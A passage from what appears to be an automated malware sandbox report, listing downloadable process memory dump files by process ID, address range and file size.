Filesize
6.0MB

Download
memory/888-396-0x0000000005E80000-0x0000000005EF6000-memory.dmp

Filesize
472KB

Download
memory/888-468-0x00000000735C0000-0x0000000073CAE000-memory.dmp

Filesize
6.9MB

Download
memory/1628-350-0x0000000000400000-0x0000000000648000-memory.dmp

Filesize
2.3MB

Download
memory/1628-302-0x0000000000400000-0x0000000000648000-memory.dmp

Filesize
2.3MB

Download
memory/1628-333-0x0000000000400000-0x0000000000648000-memory.dmp

Filesize
2.3MB

Download
memory/1700-441-0x0000000000400000-0x0000000000813000-memory.dmp

Filesize
4.1MB

Download
memory/1700-446-0x0000000000400000-0x0000000000813000-memory.dmp

Filesize
4.1MB

Download
memory/1952-300-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-409-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/1952-331-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-403-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/1952-306-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-451-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-348-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-337-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-298-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-299-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-355-0x0000000000340000-0x000000000090B000-memory.dmp

Filesize
5.8MB

Download
memory/1952-425-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/1952-430-0x0000000077604000-0x0000000077605000-memory.dmp

Filesize
4KB

Download
memory/1952-428-0x00000000773B0000-0x0000000077572000-memory.dmp

Filesize
1.8MB

Download
memory/2768-279-0x0000000000880000-0x00000000009D6000-memory.dmp

Filesize
1.3MB

Download
memory/2768-395-0x00000000735C0000-0x0000000073CAE000-memory.dmp

Filesize
6.9MB

Download
memory/3188-275-0x0000000000400000-0x0000000000E8F000-memory.dmp

Filesize
10.6MB

Download
memory/3188-480-0x00000000773B0000-0x0000000077572000-memory.dmp

Filesize
1.8MB

Download
memory/3188-293-0x0000000000400000-0x0000000000E8F000-memory.dmp

Filesize
10.6MB

Download
memory/3188-450-0x0000000000400000-0x0000000000E8F000-memory.dmp

Filesize
10.6MB

Download
memory/3188-330-0x0000000000400000-0x0000000000E8F000-memory.dmp

Filesize
10.6MB

Download
memory/3188-477-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/3188-448-0x0000000000400000-0x0000000000E8F000-memory.dmp

Filesize
10.6MB

Download
memory/3188-479-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/3188-478-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/3188-476-0x00000000773B0000-0x0000000077572000-memory.dmp

Filesize
1.8MB

Download
memory/3188-406-0x0000000000400000-0x0000000000E8F000-memory.dmp

Filesize
10.6MB

Download
memory/3576-445-0x0000000002E60000-0x0000000002E8D000-memory.dmp

Filesize
180KB

Download
memory/3576-467-0x0000000000400000-0x0000000002D30000-memory.dmp

Filesize
41.2MB

Download
memory/3636-484-0x0000000000400000-0x0000000000813000-memory.dmp

Filesize
4.1MB

Download
memory/3768-472-0x0000000140000000-0x0000000141A14000-memory.dmp

Filesize
26.1MB

Download
memory/3768-404-0x00007FF8955E0000-0x00007FF8955E2000-memory.dmp

Filesize
8KB

Download
memory/3768-410-0x0000000140000000-0x0000000141A14000-memory.dmp

Filesize
26.1MB

Download
memory/4012-10-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-129-0x00007FF8924F0000-0x00007FF892739000-memory.dmp

Filesize
2.3MB

Download
memory/4012-8-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-0-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-4-0x00007FF8924F0000-0x00007FF892739000-memory.dmp

Filesize
2.3MB

Download
memory/4012-9-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-417-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-7-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-201-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-2-0x00007FF8944A0000-0x00007FF89454E000-memory.dmp

Filesize
696KB

Download
memory/4012-5-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-11-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-12-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-191-0x00007FF895400000-0x00007FF8955DB000-memory.dmp

Filesize
1.9MB

Download
memory/4012-226-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-13-0x00007FF895400000-0x00007FF8955DB000-memory.dmp

Filesize
1.9MB

Download
memory/4012-37-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-127-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-128-0x00007FF603140000-0x00007FF6039A4000-memory.dmp

Filesize
8.4MB

Download
memory/4012-6-0x00007FF880000000-0x00007FF880002000-memory.dmp

Filesize
8KB

Download
memory/4012-1-0x00007FF8924F0000-0x00007FF892739000-memory.dmp

Filesize
2.3MB

Download
memory/4012-3-0x00007FF880030000-0x00007FF880031000-memory.dmp

Filesize
4KB

Download
memory/4012-190-0x00007FF8924F0000-0x00007FF892739000-memory.dmp

Filesize
2.3MB

Download
memory/4052-352-0x00000000735C0000-0x0000000073CAE000-memory.dmp

Filesize
6.9MB

Download
memory/4052-277-0x00000000003A0000-0x00000000003F4000-memory.dmp

Filesize
336KB

Download
memory/4172-356-0x0000000010000000-0x0000000014A80000-memory.dmp

Filesize
74.5MB

Download
memory/4172-469-0x00000000003A0000-0x0000000000A4D000-memory.dmp

Filesize
6.7MB

Download
memory/4352-402-0x0000000000400000-0x0000000000EF6000-memory.dmp

Filesize
11.0MB

Download
memory/4352-449-0x0000000000400000-0x0000000000EF6000-memory.dmp

Filesize
11.0MB

Download
memory/4352-455-0x0000000000400000-0x0000000000EF6000-memory.dmp

Filesize
11.0MB

Download
memory/4352-368-0x0000000000400000-0x0000000000EF6000-memory.dmp

Filesize
11.0MB

Download
memory/4352-326-0x0000000000400000-0x0000000000EF6000-memory.dmp

Filesize
11.0MB

Download
memory/4352-473-0x00000000773B0000-0x0000000077572000-memory.dmp

Filesize
1.8MB

Download
memory/4352-475-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/4352-481-0x00000000773B0000-0x0000000077572000-memory.dmp

Filesize
1.8MB

Download
memory/4352-485-0x0000000000400000-0x0000000000EF6000-memory.dmp

Filesize
11.0MB

Download
memory/4352-483-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/4352-482-0x0000000075530000-0x0000000075600000-memory.dmp

Filesize
832KB

Download
memory/4600-423-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4600-282-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4680-297-0x0000000005980000-0x0000000005A1C000-memory.dmp

Filesize
624KB

Download
memory/4680-295-0x0000000000B10000-0x00000000010FC000-memory.dmp

Filesize
5.9MB

Download
memory/4680-401-0x00000000735C0000-0x0000000073CAE000-memory.dmp

Filesize
6.9MB

Download
memory/4908-349-0x00000000735C0000-0x0000000073CAE000-memory.dmp

Filesize
6.9MB

Download
memory/4908-274-0x0000000000950000-0x000000000098C000-memory.dmp

Filesize
240KB

Download
memory/5052-357-0x0000000002FC0000-0x00000000030C0000-memory.dmp

Filesize
1024KB

Download
memory/5052-471-0x0000000000400000-0x0000000002D2A000-memory.dmp

Filesize
41.2MB

Download
memory/5052-470-0x0000000002F70000-0x0000000002F97000-memory.dmp

Filesize
156KB

Download